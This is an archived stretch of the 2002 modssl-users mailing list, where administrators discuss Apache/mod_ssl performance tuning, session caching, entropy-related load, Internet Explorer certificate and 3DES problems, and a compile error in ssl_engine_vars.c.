As a first tip - 50 requests per second is very slow already just for
http. I'd look at that first. Don't forget to bear in mind the size of the
page you're pulling down with your http request - multiply that by 50 and
check that you're not approaching any bandwidth limitation of your network
interfaces! :-)

Aside from that - there's a variety of settings in the default apache
config (at least this is true for 1.3.*) that although "generic" and
"helpful" are most certainly not "optimal". Just pulling down
http:/// (ie. the "default page") can involve multiple file
I/O calls by apache just trying to figure out which HTML file to use (ie.
mime-magic, language support, etc). Numerous "Options" directives in
apache slow down generic operation so you may want to wade into the config
file pruning what you can. Likewise, turning off keepalives (which are
evil and should be amputated from all existing and future source) can be a
good idea - the little bit of one-browser-straight-line speed improvement
keepalives give a browser are more than compensated for by the
process-bloat and scalability hassles it gives your server (especially as
modern browsers launch multiple requests in parallel anyway when they want
to "speed up").

I found that I could eek quite a bit of speed improvement out of Apache
just by tweaking the config file and removing fancy (and almost never
used) modules and options.

Then you move onto the ssl-specific stuff ... disabling the "COMPAT" stuff
in mod_ssl is a good idea - last time I checked, the code that populates
environment variables with https-specifics was completely ass-about-face.
I measured something ridiculous like 20,000 strcmp() operations for a
single https handshake. Turning off "compat" support doesn't remove that
problem, but mitigates it somewhat by reducing (substantially) the number
of environment variables modssl tries to populate. Ie. this reduces the
number of iterations of the (slow) loop logic. You also get some mileage
by reducing the verbosity of log output - I'd recommend "Warn" as the
noisiest level you'd want if performance is important (for the regular
Apache LogLevel as well as the modssl-specific one).

> http://httpd.apache.org/docs/misc/perf-tuning.html

You might also want to check the README in the 'swamp' package (shameless
plug, http://www.geoffthorpe.net/crypto/swamp/) - apart from explaining
the usage of 'swamp' (which you may not care for) it does go into a
variety of considerations about client and/or server speeds and how to
meaningfully benchmark and interpret results. Just to start off with,
you've probably (with your https tests) fallen into the first gotcha - EDH
cipher suites. It wouldn't surprise me if your benchmarking program was
negotiating these much slower but higher-security cipher-suites. These
suites aren't actually supported by common browsers anwyay so the
usefulness of those numbers is questionable. OTOH: If you're only getting
50 ops/sec with plain http then it could also just be a hopelessly slow
web server. If it *is* EDH cipher-suites, then your numbers could go up by
a factor of 5 or much more if you test with non-ephemeral suites (eg.
RC4-SHA).

> > I've tried setting SSLMutex to use sem and
> > SSLSessionCache to
> > shm:/usr/local/apache/logs/ssl_gcache_data(512000),
>
> shmcb can perform better than shmht under stress (shm == shmht in 1.3, shm
> == shmcb in 2.0, though you can explicitly specify either choice in both
> versions)... that's probably worth looking into.  See the thread
> http://marc.theaimsgroup.com/?l=apache-modssl&m=98529562629436&w=2 for an
> explanation of the differences (though some of the information there is
> out of date by now, eg shmcb is no longer experimental).

What my failed searches for benchmarking posts *did* turn up was a bit of
info on the 'shmcb' stuff. Eg. some misc. posts of mine that turned up in
that search that touch on session caching and testing (in no particular
order);

(a bit of a monster about 'shmcb')
http://marc.theaimsgroup.com/?l=apache-modssl&m=98531062704750&w=2

(a bit on swamp usage and session caching)
http://marc.theaimsgroup.com/?l=apache-modssl&m=98651105121737&w=2

(something else about problems with 'shmht')
http://marc.theaimsgroup.com/?l=apache-modssl&m=99997423802243&w=2

oh yeah, there's also that security problem with modssl that I mentioned
ages ago - AFAIK this still hasn't been changed in modssl and *may* not
yet have changed in apache 2.0 either. Ralf or David, please correct me
if I'm wrong;

http://marc.theaimsgroup.com/?l=apache-modssl&m=99717585106420&w=2

> > but those changes didn't improve the results.
>
> It should actually be a rather drastic improvement over other session
> cache methods.  I definitely think you need to concentrate on the rest of
> Apache first and then come back to looking at SSL tuning.

Yes, if the move from dbm to shm (any kind of shm for that matter) didn't
show up on your benchmarks, then there's some other kind of sludge in your
setup that is large enough to obscure the benefits of tighter tuning at
the session caching level. Again, I'd recommend taking a look at 'swamp's
README (you can read it online if you don't want to download the package).

Regards,
Geoff

-- 
Geoff Thorpe, geoff(at)geoffthorpe(dot)net

2000 years on, it's a different empire but the same
zealots and the same attrocities.


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 31 20:16:15 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA10515; Fri, 31 May 2002 20:15:31 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id UAA10377; Fri, 31 May 2002 20:14:10 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 636864CE74A; Fri, 31 May 2002 20:14:09 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id E08DE28706; Fri, 31 May 2002 19:49:13 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from biscuit.hampshire.edu id SAA29861; Fri, 31 May 2002 18:23:13 +0200 (MET DST)
Received: from waxor (helo=localhost)
	by biscuit.hampshire.edu with local-esmtp (Exim 3.35 #1 (Debian))
	id 17DpEf-0005LM-00; Fri, 31 May 2002 11:26:41 -0500
Date: Fri, 31 May 2002 11:26:40 -0500 (EST)
From: Mikel Waxler 
X-X-Sender: waxor@biscuit.hampshire.edu
To: modssl-users@modssl.org
Cc: waXor 
Subject: very heavy load
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mikel Waxler 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Note: PLease CC replies. I am posting from off list.

I'm working on a FreeBSD 4.4 machine running Apache with mod_ssl.
Apache/1.3.22 (Unix)
OpenSSL 0.9.6a 5 Apr 2001
mod_ssl-2.8.5-1.3.22

The server also does mysql and some other services. It is a Xeon 750 with 1gb of ram.

When the link to ssl is being used from the website server load goes from
about .90 to 35-45.

This makes the server deathly slow. there are Images on that page but not
many.

Where do I go from here? This load seems really high.

HampshireCollege.student("Mikel Waxler");

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 31 21:16:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA16691; Fri, 31 May 2002 21:15:28 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from deepthought.cs.virginia.edu id VAA16667; Fri, 31 May 2002 21:14:58 +0200 (MET DST)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g4VJCgn28723
	for ; Fri, 31 May 2002 15:12:42 -0400
Date: Fri, 31 May 2002 15:12:42 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: modssl-users@modssl.org
Subject: Re: Performance Tuning on Apache 1.3.24 with mod_ssl 2.8.8
In-Reply-To: 
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Fri, 31 May 2002, Geoff Thorpe wrote:

> oh yeah, there's also that security problem with modssl that I mentioned
> ages ago - AFAIK this still hasn't been changed in modssl and *may* not
> yet have changed in apache 2.0 either. Ralf or David, please correct me
> if I'm wrong;
> http://marc.theaimsgroup.com/?l=apache-modssl&m=99717585106420&w=2

This was fixed in 2.0 as of 2.0.25 but is not yet fixed in 1.3's modssl.

--Cliff


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 31 21:41:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA18246; Fri, 31 May 2002 21:40:33 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from pincoya.com id VAA18168; Fri, 31 May 2002 21:39:30 +0200 (MET DST)
Received: from furble (IDENT:gordo@localhost [127.0.0.1])
	by pincoya.com (8.11.2/8.11.2) with ESMTP id g4VJuhp14226
	for ; Fri, 31 May 2002 12:56:43 -0700
Date: Fri, 31 May 2002 12:56:43 -0700
From: "Gordon P. Oliver" 
To: modssl-users@modssl.org
Subject: SSL - Tomcat size problem.
Message-ID: <20020531125643.C14112@furble>
Mime-Version: 1.0
Content-Type: text/plain; format=flowed; charset=ISO-8859-1
X-Mailer: Balsa 1.2.3
Lines: 18
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id VAA18232
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Gordon P. Oliver" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Hi.
   I seem to have a problem with using mod ssl and
tomcat. I get an IOException, and the file is not
sent (note that this is not the common IOException
that is harmless). The combinations that work/fail.

    6M file w/o SSL  = no problem
    6M file w/ SSL   = connection reset
    4 byte file w/ SSL = no problem

I'm sure that there is some point between the 4
byte file and the 6M where it simply stops working.

Does anyone out there have any idea of why this
would occur? Is there some magical buffer size that
only effects SSL?
	Gordon Oliver
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 31 22:11:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA20116; Fri, 31 May 2002 22:10:18 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id WAA20071; Fri, 31 May 2002 22:09:42 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 7FB974CE73E; Fri, 31 May 2002 22:09:41 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 2AD5428749; Fri, 31 May 2002 22:09:23 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from biscuit.hampshire.edu id UAA12652; Fri, 31 May 2002 20:35:29 +0200 (MET DST)
Received: from waxor (helo=localhost)
	by biscuit.hampshire.edu with local-esmtp (Exim 3.35 #1 (Debian))
	id 17DrIm-0005VU-00
	for ; Fri, 31 May 2002 13:39:04 -0500
Date: Fri, 31 May 2002 13:39:04 -0500 (EST)
From: Mikel Waxler 
X-X-Sender: waxor@biscuit.hampshire.edu
To: modssl-users@modssl.org
Subject: Re: very heavy load
In-Reply-To: 
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mikel Waxler 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Fixed my own problem,
The ssl_engine_log was taking 2-3 seconds when generating entropy. I
changed the mod_ssl configuration in httpd.conf so that
sslrandomseed came from /dev/urandom instead of builtin.

This seems to have fixed the problem.



On Fri, 31 May 2002, Mikel Waxler wrote:

> Note: PLease CC replies. I am posting from off list.
>
> I'm working on a FreeBSD 4.4 machine running Apache with mod_ssl.
> Apache/1.3.22 (Unix)
> OpenSSL 0.9.6a 5 Apr 2001
> mod_ssl-2.8.5-1.3.22
>
> The server also does mysql and some other services. It is a Xeon 750 with 1gb of ram.
>
> When the link to ssl is being used from the website server load goes from
> about .90 to 35-45.
>
> This makes the server deathly slow. there are Images on that page but not
> many.
>
> Where do I go from here? This load seems really high.
>
> HampshireCollege.student("Mikel Waxler");
>
>
>

HampshireCollege.student("Mikel Waxler");

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 31 22:13:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA20305; Fri, 31 May 2002 22:12:29 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from romeo.rtfm.com id WAA20164; Fri, 31 May 2002 22:11:14 +0200 (MET DST)
Received: (ekr@localhost) by romeo.rtfm.com (8.11.3/8.6.4) id g4VKCeu69901; Fri, 31 May 2002 13:12:40 -0700 (PDT)
To: modssl-users@modssl.org
Subject: Re: SSL - Tomcat size problem.
References: <20020531125643.C14112@furble>
Mime-Version: 1.0 (generated by tm-edit 7.108)
Content-Type: text/plain; charset=US-ASCII
From: Eric Rescorla 
Date: 31 May 2002 13:12:39 -0700
In-Reply-To: "Gordon P. Oliver"'s message of "Fri, 31 May 2002 12:56:43 -0700"
Message-ID: 
Lines: 26
X-Mailer: Gnus v5.6.45/XEmacs 20.4 - "Emerald"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Eric Rescorla 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

"Gordon P. Oliver"  writes:
>    I seem to have a problem with using mod ssl and
> tomcat. I get an IOException, and the file is not
> sent (note that this is not the common IOException
> that is harmless). The combinations that work/fail.
> 
>     6M file w/o SSL  = no problem
>     6M file w/ SSL   = connection reset
>     4 byte file w/ SSL = no problem
> 
> I'm sure that there is some point between the 4
> byte file and the 6M where it simply stops working.
> 
> Does anyone out there have any idea of why this
> would occur? Is there some magical buffer size that
> only effects SSL?
There shouldn't be.

What client are you using?

-Ekr


-- 
[Eric Rescorla                                   ekr@rtfm.com]
                http://www.rtfm.com/
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jun  1 17:58:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA05045; Sat, 1 Jun 2002 17:57:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from falla.videotron.net id RAA05024; Sat, 1 Jun 2002 17:56:31 +0200 (MET DST)
Received: from betty.localnet ([24.202.164.28])
 by falla.videotron.net (Sun Internet Mail Server sims.3.5.1999.12.14.10.29.p8)
 with ESMTP id <0GX100IAGAY4LB@falla.videotron.net> for modssl-users@modssl.org; Sat,  1 Jun 2002 11:56:29 -0400 (EDT)
Received: from localhost ([127.0.0.1] ident=geoff) by betty.localnet with esmtp (Exim 3.35 #1 (Debian))
 id 17EBEy-00007L-00; Sat, 01 Jun 2002 11:56:28 -0400
Date: Sat, 01 Jun 2002 11:56:28 -0400 (EDT)
From: Geoff Thorpe 
Subject: Re: Performance Tuning on Apache 1.3.24 with mod_ssl 2.8.8
In-reply-to: 
To: modssl-users@modssl.org
Message-id: 
MIME-version: 1.0
Content-type: TEXT/PLAIN; charset=US-ASCII
X-X-Sender: geoff@betty.localnet
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Geoff Thorpe 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

On Fri, 31 May 2002, Cliff Woolley wrote:

> On Fri, 31 May 2002, Geoff Thorpe wrote:
>
> > oh yeah, there's also that security problem with modssl that I mentioned
> > ages ago - AFAIK this still hasn't been changed in modssl and *may* not
> > yet have changed in apache 2.0 either. Ralf or David, please correct me
> > if I'm wrong;
> > http://marc.theaimsgroup.com/?l=apache-modssl&m=99717585106420&w=2
>
> This was fixed in 2.0 as of 2.0.25 but is not yet fixed in 1.3's modssl.

Ah, thanks for the update on that. I mentioned this problem a couple of
times *ages* ago, including private mail to Ralf, but it seemed very few
people seemed to regard it as "an issue". I'm glad Apache 2.0 has taken it
seriously. Ralf, would it be possible to get it similarly incorporated
into the 1.3.* tree? Please?

Cheers,
Geoff


-- 
Geoff Thorpe, geoff(at)geoffthorpe(dot)net

2000 years on, it's a different empire but the same
zealots and the same attrocities.


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun  3 16:25:14 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA04176; Mon, 3 Jun 2002 16:24:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from web11908.mail.yahoo.com id QAA04147; Mon, 3 Jun 2002 16:23:15 +0200 (MET DST)
Message-ID: <20020603142308.43988.qmail@web11908.mail.yahoo.com>
Received: from [216.109.205.74] by web11908.mail.yahoo.com via HTTP; Mon, 03 Jun 2002 07:23:08 PDT
Date: Mon, 3 Jun 2002 07:23:08 -0700 (PDT)
From: scott sutton 
Subject: solais2.5.5
To: modssl-users@modssl.org
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="0-1121990614-1023114188=:41640"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: scott sutton 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

--0-1121990614-1023114188=:41640
Content-Type: text/plain; charset=us-ascii


when i boot up the system a sparc 10 from sun mircosystems i get the mesage (Can't deduct msgbuf from physical memory list)

Program terminated can any one help me with this Thanx Much Scott



---------------------------------
Do You Yahoo!?
Yahoo! - Official partner of 2002 FIFA World Cup
--0-1121990614-1023114188=:41640
Content-Type: text/html; charset=us-ascii


when i boot up the system a sparc 10 from sun mircosystems i get the mesage (Can't deduct msgbuf from physical memory list)


Program terminated can any one help me with this Thanx Much Scott

Do You Yahoo!?

Yahoo! - Official partner of 2002 FIFA World Cup
--0-1121990614-1023114188=:41640--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun  3 17:54:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA08128; Mon, 3 Jun 2002 17:53:14 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from gate2-b.volkswagen.de id RAA08101; Mon, 3 Jun 2002 17:52:43 +0200 (MET DST)
Received: (from smtpd@localhost)
	by gate2-b.volkswagen.de (8.9.1a/8.9.1) id RAA20001
	for ; Mon, 3 Jun 2002 17:52:41 +0200 (MET DST)
Received: from Volkswagen by relay2.volkswagen.de, id smtpdAAARAX7__; Mon Jun  3 17:52:33 2002
Received: from devwagwodx0006.wob.vw.de ([10.208.137.183]) by devwagwodx0053.wob.vw.de with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13)
	id MADCZ2HN; Mon, 3 Jun 2002 17:52:21 +0200
Received: from volkswagen.de (ebsp09.wob.vw.de [10.184.134.18]) by devwagwodx0006.wob.vw.de with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13)
	id LR4MSC2T; Mon, 3 Jun 2002 17:52:10 +0200
Message-ID: <3CFB90C1.8010903@volkswagen.de>
Date: Mon, 03 Jun 2002 17:52:33 +0200
From: Herr Maik HERTHA 
Organization: Volkswagen AG
User-Agent: Mozilla/5.0 (X11; U; IRIX64 IP30; en-US; rv:1.0.0+) Gecko/20020526
X-Accept-Language: de, en, de-de
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: certificate doesn't apply to ie
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 8bit
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Herr Maik HERTHA 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

hi gyu's;

i've some strange experience using the (latest) openssl (0.9.6c) library.
first:
i build openssl 0.9.6b on a solaris 7 box. the library is used with 
apache 1.3.17 and modssl 2.8.0. the creation of a self-signed 
certificate was done according chapter 6 of the mod-ssl handbook. there 
are no problems. the certificate is accepted by all incarnations of ie 
and sure all the mozilla-types (ns 4.x->mozilla).
second:
i want to upgrade the apache installation to 1.3.24 with modssl 2.8.8 
and openssl 0.9.6c. the build was done on a solaris 8 box. the creation 
of the self-signed certificate was done the same way described above. no 
problems in the creation process. but after installing the certificates 
on the server they where accepted only by the mozilla-types (ns 4.x-> 
mozilla) and opera browsers. all types of ie are not able to use this 
certificate. i get their stupid error-page with zero-information :-( . 
there is no error message in the logs, only in the 'ssl_engine_log' that 
a connection was established.
then i tried using a certificate build with the openssl installation on 
the solaris 7 box. after i installed this on the apache_modssl on the 
solaris 8 box also the ie-browser are able to establish a working https 
connection.
now i'm a little bit surprised, why the newer library creates certs 
which are not able for use with ie but the older one does. where is my 
mistake? :-\

any help will be appreciated.

cu.

-- 

mit freundlichem Gruß /
best regards

Maik Hertha

--------------------------------------------------- h+h
EBSP Anwenderbetreuung, +49 5361 9-74950
Volkswagen AG / Brieffach 1721 / D-38436 Wolfsburg
http://ebsp.wob.vw.de              
maik.hertha@volkswagen.de
---------------------------------------------------
hartmann+hertha
it (beratung / entwicklung / support)
http://www.hartmann-hertha.de
mhertha@hartmann-hertha.de
--------------------------------------------------- h+h


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun  3 18:30:15 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA11063; Mon, 3 Jun 2002 18:29:29 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from MAIL2.trans-it.de id SAA11019; Mon, 3 Jun 2002 18:28:31 +0200 (MET DST)
Received: from [193.96.197.36] by MAIL2.ntmail.trans-it.net (NTMail 7.00.0018/LG0061.00.9518a920) with ESMTP id ttwnlbaa for modssl-users@modssl.org; Mon, 3 Jun 2002 18:27:13 +0200
From: "Andre Steffens" 
To: "Apache mod_ssl" 
Subject: mod_ssl for 2.0.x (Win)
Date: Mon, 3 Jun 2002 18:28:45 +0200
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Andre Steffens" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I'm searching for mod_ssl.so (binary) for Apache 2.0.36 on Win2k.

Could someone help me?

cu.
Andre

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun  3 20:58:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA17597; Mon, 3 Jun 2002 20:57:19 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id UAA17569; Mon, 3 Jun 2002 20:56:17 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 2BB4E4CE74D; Mon,  3 Jun 2002 20:56:16 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id D7A6228ACB; Mon,  3 Jun 2002 20:45:37 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from email.nist.gov id UAA16289; Mon, 3 Jun 2002 20:22:23 +0200 (MET DST)
Received: from rsa.nist.gov (rsa.ncsl.nist.gov [129.6.54.176])
	by email.nist.gov (8.12.2/8.12.2) with ESMTP id g53IMKg5008131
	for ; Mon, 3 Jun 2002 14:22:21 -0400 (EDT)
Message-Id: <5.1.0.14.2.20020602141108.009f2ec0@email.nist.gov>
X-Sender: mfanto@email.nist.gov
X-Mailer: QUALCOMM Windows Eudora Version 5.1
Date: Sun, 02 Jun 2002 14:19:56 -0400
To: modssl-users@modssl.org
From: "Matthew J. Fanto" 
Subject: Internet Explorer and 3DES
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Matthew J. Fanto" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I am having a problem with mod_ssl and Internet Explorer 6.0. I have set 
mod_ssl to only allow 3DES CipherSuites (SSLCipherSuite 3DES:!MD5). All 
browsers handle this fine except Internet Explorer, which only works if RC4 
is enabled. When the user views the page, they see a "Cannot find server" 
message. I have checked the output of ssldump, and see that the 
client/server negotiate a cipher suite (SSL_RSA_WITH_3DES_EDE_CBC_SHA). 
After ChangeCipherSpec the client closes the connection then reestablishes 
it. When it is reestablished, it gets to application_data, but the user 
never see's this. Can anyone point me in the right direction on solving this?


Matthew J. Fanto
matthew.j.fanto@nist.gov
Computer Security Division
National Institute of Standards and Technology (NIST)

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun  3 20:58:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA17614; Mon, 3 Jun 2002 20:57:35 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id UAA17568; Mon, 3 Jun 2002 20:56:17 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 0A0C24CE61C; Mon,  3 Jun 2002 20:56:16 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 094E72873D; Mon,  3 Jun 2002 20:45:23 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from gatesrv.RZ.UniBw-Muenchen.de id PAA02089; Mon, 3 Jun 2002 15:31:05 +0200 (MET DST)
Received: from i01p01.lrt.unibw-muenchen.de (i01p01.LRT.UniBw-Muenchen.de [137.193.71.13])
	by gatesrv.RZ.UniBw-Muenchen.de (8.11.2/8.11.2) with ESMTP id g53DQK101743
	for ; Mon, 3 Jun 2002 15:26:20 +0200 (MEST)
Received: from i01p01.lrt.unibw-muenchen.de (localhost [127.0.0.1])
	by i01p01.lrt.unibw-muenchen.de (8.11.2/8.11.2/SuSE Linux 8.11.1-0.5) with ESMTP id g53DQKp19487
	for ; Mon, 3 Jun 2002 15:26:20 +0200
Message-ID: <3CFB6E7C.E9C27B3@i01p01.lrt.unibw-muenchen.de>
Date: Mon, 03 Jun 2002 15:26:20 +0200
From: Ekkehard Ellmann LRT1 
Organization: LRT1.UniBw-Muenchen.de
X-Mailer: Mozilla 4.79 [en] (X11; U; Linux 2.2.17 i686)
X-Accept-Language: en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: mod_ssl-2.8.8-1.3.24
Content-Type: multipart/mixed;
 boundary="------------3F91358AE6E065A519A1D613"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ekkehard Ellmann LRT1 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.
--------------3F91358AE6E065A519A1D613
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Running  make in apache 1.3.24 gave a compile-error in
apache_1.3.24/src/modules/ssl/ssl_engine_vars.c
The  compiler pointed  at the line:
{ "UID",   NID_uniqueIdentifier       },

at  the struct  listed below.
I  could not see,  how to cure.   Therefore I   applied "..." and it
worked.
Can  somebody tell me the  correct cure?
(linux-2.2.17,  apache-1.3.24,  mod_ssl-2.8.8-1.3.24,
openssl-0.9.7-beta1)

Please mail me direct.
Thanks a lot.

Ekk.



static const struct {
    char *name;
    int  nid;
} ssl_var_lookup_ssl_cert_dn_rec[] = {
    { "C",     NID_countryName            },
    { "ST",    NID_stateOrProvinceName    }, /* officially    (RFC2156)
*/
    { "SP",    NID_stateOrProvinceName    }, /* compatibility (SSLeay)
*/
    { "L",     NID_localityName           },
    { "O",     NID_organizationName       },
    { "OU",    NID_organizationalUnitName },
    { "CN",    NID_commonName             },
    { "T",     NID_title                  },
    { "I",     NID_initials               },
    { "G",     NID_givenName              },
    { "S",     NID_surname                },
    { "D",     NID_description            },
    { "UID",   "NID_uniqueIdentifier"       }, /*Ekk :...mit "" bei NID_
gehts, aber .....,!!!! */
    { "Email", NID_pkcs9_emailAddress     },
    { NULL,    0                          }
};


--------------3F91358AE6E065A519A1D613
Content-Type: text/x-vcard; charset=us-ascii;
 name="ell.vcf"
Content-Description: Card for Ekkehard Ellmann LRT1 
Content-Disposition: attachment;
 filename="ell.vcf"
Content-Transfer-Encoding: 7bit

begin:vcard 
n:Ellmann;Ekkehard
tel;cell:+49 172 2874295
x-mozilla-html:FALSE
org:UniBw-München;LRT 1
version:2.1
email;internet:ell@i01p01.lrt.unibw-muenchen.de
title:Dipl.-Math.
adr;quoted-printable:;;Ekkehard Ellmann=0D=0ALRT 1/UniBwM;Neubiberg;;85577;Germany
x-mozilla-cpt:;26400
fn:Ekkehard Ellmann
end:vcard

--------------3F91358AE6E065A519A1D613--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
